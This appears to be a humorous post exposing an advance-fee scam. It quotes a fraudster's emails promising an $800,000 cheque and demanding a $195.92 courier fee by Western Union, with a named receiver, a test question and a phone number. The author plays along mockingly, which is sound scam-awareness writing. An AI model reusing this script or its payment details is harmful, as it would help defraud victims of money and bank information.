WELL, I RECEIVE YOUR EMAIL AND ITS CONTENT AND I HAVE MADE SOME INQUIRES ACCORDING TO THE INSTRUCTIONS GIVEN TO ME BY MY BOSS BEFORE HE WENT TO LONDON AND I WANT YOU TO DO ME A FAVOR NOW TOWARDS YOUR FUNDS IN A CERTIFIED BANK CHEQUE ($800,000.00 USD), DO YOU WANT TO RECEIVE IT THROUGH BANK TO BANK WIRING TRANSFER OR DO YOU WANT IT THROUGH DELIVERY FROM COURIER COMPANY, I WANT YOU TO GET BACK TO ME TODAY CONCERNING THIS MATTER! AND IF YOUR CHOICE IS BANK TO BANK WIRING TRANSFER, PLEASE TRY TO FORWARD ME YOUR BANK ACCOUNT INFORMATION BECAUSE THE BANK HERE NEEDS IT TO TRANSFER YOUR FUND INTO YOUR ACCOUNT THERE OK.


BUT IF YOUR CHOICE IS THROUGH COURIER COMPANY, THEN I ALSO WANT YOU TO GET BACK TO ME AS SOON AS POSSIBLE, SO THAT I WILL MAKE THE REMAINING ARRANGEMENT WITH THE COURIER COMPANY HERE CONCERNING HOW TO DELIVERY YOUR CERTIFIED BANK CHEQUE OF $800, 000.00 USD TO YOU, BECAUSE YOUR ADDRESS IS ALREADY RECEIVED HERE OK.

THANKS AND HAPPY TO HEAR BACK FROM YOU,


YOURS SINCERELY,
JOHN IZUALO,
PHONE: +234-806-4228395.

Me

Hello Mr John,

I would like to go through a courier company because I do not have currently my bank account available. What should I do?

Thanks

Best

Scammer

Dear Davide XXXX,
Well, I received your e-mail and its content but inquires I made today stated that delivering your cheque of USD$800,000.00 to you through courier company will only cost you $195.92 for its delivering through FedEx.

and you are required to send the delivering fee of $195.92 through western union or money gram money transfer in the below receiver's name information ok. As soon as you send the fee then get back to me with the MTCN and your cheque of $800, 000.00 must be delivered to you without wasting any time OK.

HERE IS THE RECEIVER'S NAME INFORMATION TO SEND THE REQUIRED FEE OF $195.92 THROUGH WESTERN UNION MONEY TRANSFER OR MONEY GRAM:


RECEIVER'S NAME: PETER NWAKOR

CITY: LAGOS

COUNTRY: NIGERIA

COUNTRY CODE: +234.

TEST QUESTION: IN GOD?

ANSWER: WE TRUST

Thanks,

Mr. John Izualo.

Phone: +234-806-4228395

Me

Hi Thanks a lot.

Tomorrow I will send the money. When I will receive the money?

Do you need more information to send the money?

Thanks a lot thanks

Best

Everything was going fine and I was so happy to be receiving my payment of $800K.

But I made a mistake: I waited too long to make the payment via Western Union and my Nigerian friend got angry 🙁

He replied to me the following:

Scammer

I am here to inform you that I have tried my best to make sure you receive your cheque, but I can see that you are not serious about it; failure to comply with me by the fee today and tomorrow, I will return the cheque to my boss first thing on Monday morning.

The weekend started and I could not reach him anymore; he doesn't answer. My yacht has to wait... maybe the next scam will be the right one!
